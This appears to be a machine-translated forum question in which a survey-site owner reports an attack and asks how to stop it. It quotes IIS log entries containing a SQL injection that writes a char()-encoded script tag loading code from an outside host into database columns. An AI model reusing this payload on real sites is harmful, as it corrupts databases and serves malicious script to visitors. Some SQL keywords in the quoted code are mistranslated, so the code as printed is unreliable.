У нас есть сайт опроса, который, по-видимому, подвергся нападению. Симптомы идентичны тем, что было описано на следующей странице на этом сайте: Атака XSS на веб-сайте ASP.NET.
Я нашел несколько записей в наших журналах IIS, содержащих вредоносный код:
</title> < script src= http://google-stats49.info/ur.php > .
Ниже приведен пример значения поля cs-uri-query для одной из записей журнала IIS.
surveyID = 91 + обновление + usd_ResponseDetails + набор + CategoryName = REPLACE (литая (CategoryName + а + VARCHAR (8000)), литой (char (60)% 2Bchar (47)% 2Bchar (116)% 2Bchar ( 105)% 2Bchar (116)% 2Bchar (108)% 2Bchar (101)% 2Bchar (62)% 2Bchar (60)% 2Bchar (115)% 2Bchar (99)% 2Bchar (114)% 2Bchar (105)% 2Bchar ( 112)% 2Bchar (116)% 2Bchar (32)% 2Bchar (115)% 2Bchar (114)% 2Bchar (99)% 2Bchar (61)% 2Bchar (104)% 2Bchar (116)% 2Bchar (116)% 2Bchar ( 112)% 2Bchar (58)% 2Bchar (47)% 2Bchar (47)% 2Bchar (103)% 2Bchar (111)% 2Bchar (111)% 2Bchar (103)% 2Bchar (108)% 2Bchar (101)% 2Bchar ( 45)% 2Bchar (115)% 2Bchar (116)% 2Bchar (97)% 2Bchar (116)% 2Bchar (115)% 2Bchar (53)% 2Bchar (48)% 2Bchar (46)% 2Bchar (105)% 2Bchar ( 110)% 2Bchar (102)% 2Bchar (111)% 2Bchar (47)% 2Bchar (117)% 2Bchar (114)% 2Bchar (46)% 2Bchar (112)% 2Bchar (104)% 2Bchar (112)% 2Bchar ( 62)% 2Bchar (60)% 2Bchar (47)% 2Bchar (115)% 2Bchar (99)% 2Bchar (114)% 2Bchar (105)% 2Bchar (112)% 2Bchar (116)% 2Bchar (62) + а + VARCHAR (8000)), литой (char (32) + As + VARCHAR (8))) -
Я не понимаю, как работает этот код, но, видимо, это то, что отправляется в строке запроса, чтобы повреждать столбцы в наших таблицах базы данных. На данный момент мы закрыли наш сайт. Мы можем удалить скрипты из базы данных, но это не помешает ему снова испортиться, когда мы вернем сайт обратно.
Есть ли у кого-нибудь предложения о том, как предотвратить это?